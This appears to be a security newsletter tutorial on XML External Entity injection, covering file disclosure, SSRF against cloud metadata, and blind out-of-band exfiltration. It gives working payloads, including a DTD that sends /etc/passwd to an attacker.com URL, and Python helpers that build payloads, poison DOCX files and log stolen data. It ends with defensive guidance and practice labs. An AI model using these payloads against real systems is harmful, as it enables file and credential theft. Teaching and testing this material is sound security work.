XXE Injection: When XML Parsers Become Your Worst Enemy
November 2, 2025
Hey everyone,
A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn’t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn’t nail the exploitation.
That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.
The thing about XXE is that it’s one of those vulnerabilities that feels almost too easy when you find it. But when you don’t know what to look for, you’ll walk right past it. And that’s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.
So let’s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.
What XXE Actually Is
XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:
- Read arbitrary files from the filesystem
- Make HTTP requests to internal systems (SSRF)
- Perform denial of service attacks
- In rare cases, achieve remote code execution
The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn’t sanitized, attackers control what gets loaded.
Here’s the basic structure of an XXE payload:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
When the parser processes this, it reads /etc/passwd and injects its contents where &xxe; appears. If that data shows up in the application’s response, you’ve got file disclosure.
Why This Still Matters in 2025
You’d think this would be fixed by now, right? XXE got its own category (A4) in the OWASP Top 10 in 2017 and was folded into Security Misconfiguration (A05) in the 2021 edition. But XXE vulnerabilities keep showing up.
Recent examples:
- CVE-2024-34102 (CosmicSting) – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.
- CVE-2024-30043 – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.
- CVE-2023-42344 – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution without authentication.
These aren’t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don’t realize their XML parser is dangerous out of the box.
Finding XXE Vulnerabilities
Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you’d be surprised how many don’t.
Where to Look
Check any functionality that processes XML:
- File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
- API endpoints that accept Content-Type: application/xml
- SOAP services
- RSS/Atom feed parsers
- SAML authentication flows
- Configuration file uploads
Testing for XXE
Start with a basic probe. Send this payload and see if the parser even processes entities:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test "HelloXXE">
]>
<root>
<data>&test;</data>
</root>
If the response includes “HelloXXE” where you referenced &test;, the parser is processing entities. Now you can escalate.
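A minimal sketch of that probe in Python, assuming you send the payload yourself and only need help building it and checking the reply. The helper names `build_probe` and `entity_was_expanded` are made up for illustration. Python's own ElementTree expands internal entities, so it stands in here for a server that echoes the parsed value:

```python
import xml.etree.ElementTree as ET


def build_probe(marker: str = "HelloXXE") -> str:
    """Return an XML document that declares a harmless internal entity."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [\n<!ENTITY test "{marker}">\n]>\n'
        "<root>\n<data>&test;</data>\n</root>"
    )


def entity_was_expanded(response_body: str, marker: str = "HelloXXE") -> bool:
    """True if the marker came back and the raw reference did not."""
    return marker in response_body and "&test;" not in response_body


# Local stand-in for a vulnerable endpoint: parse the probe and read <data>.
echoed = ET.fromstring(build_probe()).findtext("data")
print(entity_was_expanded(echoed))
```

Against a real target you would replace the local parse with the HTTP response body. A reply that still contains the literal `&test;` suggests the value was never run through an entity-expanding parser.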
Basic File Disclosure
The classic XXE attack: read files from the server’s filesystem.
Payload to read /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<username>&xxe;</username>
</root>
If the application reflects the <username> value in its response, you’ll see the contents of /etc/passwd.
Common files to target:
- /etc/passwd – User accounts (Linux/Unix)
- /etc/hosts – Network configuration
- C:\Windows\System32\drivers\etc\hosts – Windows hosts file
- /proc/self/environ – Environment variables (might leak secrets)
- Application config files (e.g., /var/www/html/config.php)
- Cloud metadata endpoints (more on this in a sec)
One thing to watch out for: some files contain characters that break XML parsing (like < or &). We’ll handle that with Base64 encoding in the blind XXE section.
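If you want to cycle through several of those targets, a small generator saves retyping. This is a sketch only: `file_uri` and `file_disclosure_payload` are hypothetical helpers, the reflected element name `username` is taken from the example above, and the URI conversion does no percent-encoding.

```python
def file_uri(path: str) -> str:
    """Turn an absolute Linux or Windows path into a file:// URI (no escaping)."""
    if len(path) > 1 and path[1] == ":":  # drive letter, e.g. C:\...
        return "file:///" + path.replace("\\", "/")
    return "file://" + path


def file_disclosure_payload(path: str, element: str = "username") -> str:
    """Wrap a file:// external entity in the element the app reflects."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [\n<!ENTITY xxe SYSTEM "{file_uri(path)}">\n]>\n'
        f"<root>\n<{element}>&xxe;</{element}>\n</root>"
    )


targets = [
    "/etc/passwd",
    "/etc/hosts",
    "/proc/self/environ",
    r"C:\Windows\System32\drivers\etc\hosts",
]
payloads = {target: file_disclosure_payload(target) for target in targets}
print(payloads["/etc/passwd"])
```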
XXE to SSRF
This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.
Example payload:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<root>
<data>&xxe;</data>
</root>
The server makes an HTTP request to http://internal-service:8080/admin and includes the response in its output. This bypasses firewalls and gives you access to internal APIs, admin panels, or cloud metadata endpoints.
Cloud metadata exploitation:
If you’re testing an app running on AWS, try this:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
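This hits the AWS instance metadata service and returns the name of the IAM role attached to the instance; append that role name to the path to retrieve its temporary credentials, which carry whatever permissions the role has. It only works where IMDSv1 is still enabled, since IMDSv2 requires a session token obtained with a PUT request. The same concept applies to Azure (http://169.254.169.254/metadata/instance?api-version=2021-02-01) and GCP, but both require a custom request header (Metadata: true and Metadata-Flavor: Google respectively) that an XXE-driven request usually can’t set.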
Combine this with the techniques from my SSRF newsletter (Issue 4), and you can chain XXE into full internal network access.
Blind XXE: When You Don’t See Output
Sometimes the application doesn’t reflect the XML data in its response. The parser processes your payload, but you don’t see the result. That’s blind XXE.
Out-of-Band (OOB) Exfiltration
The trick here is to make the server send the data to a system you control. You need two things:
- A server you control to receive the data (use Burp Collaborator, your own VPS, or webhook.site)
- A payload that references an external DTD hosted on your server
Step 1: Host a malicious DTD on your server (http://attacker.com/evil.dtd):
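<!-- External DTD: parameter entities may be referenced inside declarations here -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- &#x25; is an escaped percent sign; a bare % inside the entity value is a parse error -->
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;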
Step 2: Send this payload to the target:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
Here’s what happens:
- The parser loads your external DTD
- The DTD defines a parameter entity that reads /etc/passwd
- It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
- Your server receives the request with the file data in the query string
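On the receiving end, anything that logs query strings will do. Here is a rough sketch using only Python's standard library, assuming the `data` parameter name from the DTD above; `extract_exfil`, `ExfilHandler`, and `serve` are illustrative names, and the listener only logs requests (you still need to host evil.dtd somewhere):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_path: str, param: str = "data") -> Optional[str]:
    """Return the decoded value of ?data=... from a request path, or None."""
    query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    values = query.get(param)
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        leaked = extract_exfil(self.path)
        if leaked is not None:
            print(f"[+] {self.client_address[0]} sent: {leaked!r}")
        self.send_response(200)  # always answer so the parser does not hang
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Block forever, logging every request that carries the data parameter."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Call `serve()` on the host that attacker.com resolves to, then send the payload from Step 2.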
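Pro tip: If the file contains characters that break URLs (newlines are the usual culprit) and the target runs PHP, read it through the php://filter wrapper so it arrives Base64-encoded: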
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
Then Base64-decode the exfiltrated data on your end.
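Decoding is a one-liner in principle, but values pulled from a query string often arrive slightly mangled. This is a small sketch that assumes two common kinds of damage: `+` turned into a space by URL decoding, and stripped `=` padding. `decode_exfil` is a hypothetical helper name.

```python
import base64


def decode_exfil(value: str) -> bytes:
    """Decode Base64 taken from a query string, repairing common damage."""
    cleaned = value.replace(" ", "+").replace("\n", "")  # undo '+' -> ' '
    cleaned += "=" * (-len(cleaned) % 4)                 # restore padding
    return base64.b64decode(cleaned)


print(decode_exfil("cm9vdDp4OjA6MA"))
```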
Error-Based Blind XXE
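If OOB exfiltration doesn’t work (outbound data is filtered, only DNS gets out, etc.), you can sometimes leak data through error messages. The variant below still needs the parser to fetch an external DTD, so with no egress at all you have to fall back to repurposing a local DTD on the server.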
Malicious DTD hosted on your server (http://attacker.com/error.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- &#x25; is an escaped percent sign; a bare % inside the entity value is a parse error -->
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Payload sent to target:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
%dtd;
]>
<root></root>
The parser tries to access a file at /nonexistent/[contents of /etc/passwd], fails, and includes the file path (with embedded file contents) in the error message.
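Pulling the leaked content back out of the error is simple string work. The sketch below assumes a Java-style message ending in "(No such file or directory)". Real error formats vary by parser and platform, so treat the suffix pattern and the `leaked_from_error` name as placeholders.

```python
import re
from typing import Optional


def leaked_from_error(error_text: str, marker: str = "/nonexistent/") -> Optional[str]:
    """Return whatever follows the bogus path prefix in an error message."""
    start = error_text.find(marker)
    if start == -1:
        return None
    leaked = error_text[start + len(marker):]
    # Assumed suffix: drop the trailing OS explanation if it is present.
    return re.sub(r"\s*\(No such file or directory\)\s*$", "", leaked)


sample = (
    "java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (No such file or directory)"
)
print(leaked_from_error(sample))
```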
Note: Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.
XXE in Unexpected Places
Don’t just test plain XML endpoints. XXE hides in formats you wouldn’t expect.
File Uploads
SVG images are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.
DOCX and XLSX files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., word/document.xml), inject your payload, rezip it, and upload. I’ve seen this work in document preview features and automated processing systems.
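The unzip, edit, rezip cycle can be scripted. This is a sketch under a few assumptions: you typed a placeholder string (here `XXE_MARKER`, an arbitrary choice) into the document beforehand, the part to modify is word/document.xml, and the target parser is non-validating, so the DOCTYPE name does not have to match the root element. `inject_docx` is an illustrative helper, not part of any tool.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'


def inject_docx(docx_bytes: bytes, marker: str = "XXE_MARKER",
                member: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with a DOCTYPE added and marker -> &xxe;."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zin, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename == member:
                xml = data.decode("utf-8")
                # The DOCTYPE must come right after the XML declaration, if any.
                decl_end = xml.find("?>") + 2 if xml.startswith("<?xml") else 0
                xml = xml[:decl_end] + DOCTYPE + xml[decl_end:]
                data = xml.replace(marker, "&xxe;").encode("utf-8")
            zout.writestr(item, data)  # every other part is copied unchanged
    return out.getvalue()
```

Typical use would be reading the original file's bytes, passing them through `inject_docx`, and writing the result to a new .docx for upload. The same approach should carry over to XLSX by pointing `member` at one of its XML parts.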
XInclude Attacks
Sometimes you don’t control the entire XML document, just a single value inside it. Standard XXE won’t work because you can’t define a DOCTYPE. That’s where XInclude comes in.
If you control a value in the XML, try this:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.
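When the value you control travels as a form field, the XInclude snippet has to be URL-encoded before it goes into the request body. Here is a minimal sketch; the field names `productId` and `storeId` are invented for the example, and `xinclude_form_body` is a hypothetical helper.

```python
from typing import Dict
from urllib.parse import parse_qs, urlencode

XINCLUDE = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)


def xinclude_form_body(field: str, other_fields: Dict[str, str]) -> str:
    """Build a form-encoded body with the XInclude payload in one field."""
    return urlencode({field: XINCLUDE, **other_fields})


body = xinclude_form_body("productId", {"storeId": "1"})
print(body)
# Round-trip check: the server-side decoder should see the payload intact.
print(parse_qs(body)["productId"][0] == XINCLUDE)
```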
Content-Type Switching
Some apps accept Content-Type: application/json but also parse application/xml if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.
From this:
POST /api/user HTTP/1.1
Content-Type: application/json

{"username": "test"}
To this:
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><username>&xxe;</username></root>
If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn’t designed to accept XML.
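Converting the JSON body by hand gets tedious across many endpoints. The sketch below automates it under some assumptions: the body is a flat JSON object, its keys are valid XML element names, and the backend expects a `root` wrapper as in the example above (a real endpoint may want a different element). `json_to_xxe_xml` is an illustrative name.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_xml(json_body: str, target_field: str,
                    system_uri: str = "file:///etc/passwd") -> str:
    """Rewrite a flat JSON object as XML, placing &xxe; in one field."""
    fields = json.loads(json_body)
    parts = [
        '<?xml version="1.0"?>',
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{system_uri}">]>',
        "<root>",
    ]
    for key, value in fields.items():
        # Only the chosen field carries the entity; the rest keep their values.
        text = "&xxe;" if key == target_field else escape(str(value))
        parts.append(f"<{key}>{text}</{key}>")
    parts.append("</root>")
    return "\n".join(parts)


print(json_to_xxe_xml('{"username": "test"}', "username"))
```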
Tools You Need
Burp Suite – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.
XXEinjector – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher). https://github.com/enjoiz/XXEinjector
DTD Finder – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation. https://github.com/GoSecure/dtd-finder
PayloadsAllTheThings (XXE Section) – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
Where to Practice
PortSwigger Web Security Academy – Multiple XXE labs with increasing difficulty. All labs are free:
- Exploiting XXE to retrieve files
- Exploiting XXE to perform SSRF attacks
- Exploiting XXE via image file upload
- Exploiting XInclude to retrieve files
Main XXE page: https://portswigger.net/web-security/xxe
TryHackMe – XXE Injection Room – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF. https://tryhackme.com/room/xxeinjection
Hack The Box – BountyHunter – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario. https://app.hackthebox.com/machines/BountyHunter
Defense and Detection
If you’re defending against XXE, here’s what actually works:
Disable External Entities – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.
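// Java example: refuse any document that declares a DOCTYPE
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// setFeature throws ParserConfigurationException if the parser does not support the flag
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);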
Use Simple Data Formats – If you don’t need XML’s complexity, use JSON. Fewer features = smaller attack surface.
Input Validation – Reject any XML containing DOCTYPE, ENTITY, or SYSTEM keywords. Not foolproof (keyword filters miss XInclude payloads and documents sent in another encoding such as UTF-16), but it catches lazy attacks.
Least Privilege – Run your XML parser with minimal file system access. If it can’t read /etc/passwd, XXE becomes much less useful.
Monitor Outbound Traffic – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.
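For the DOCTYPE rejection mentioned above, letting a parser find the declaration is sturdier than matching keywords in raw bytes. This is a Python sketch of the idea using only the standard library; `parse_untrusted` and `DoctypeForbidden` are names invented here, and the document is parsed twice for simplicity. In production, a maintained hardening library is likely the better choice.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE at all."""
    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject  # fires before any entity is used
    checker.Parse(xml_bytes, True)            # raises DoctypeForbidden or ExpatError
    return ET.fromstring(xml_bytes)


print(parse_untrusted(b"<root><data>ok</data></root>").findtext("data"))
```

Because the check runs inside the parser, it should not depend on how the document is encoded or how the declaration is spaced, which is where keyword filters tend to fail.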
Wrapping Up
XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.
The reason XXE keeps appearing in CVEs is that it’s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features “just in case” and never disable them.
So next time you’re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.
Coming This Week
This week, probably on Wednesday, I’ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We’ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they’re critical for smart contract and wallet security. It’s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.
Thanks for reading, and happy hunting.
Ruben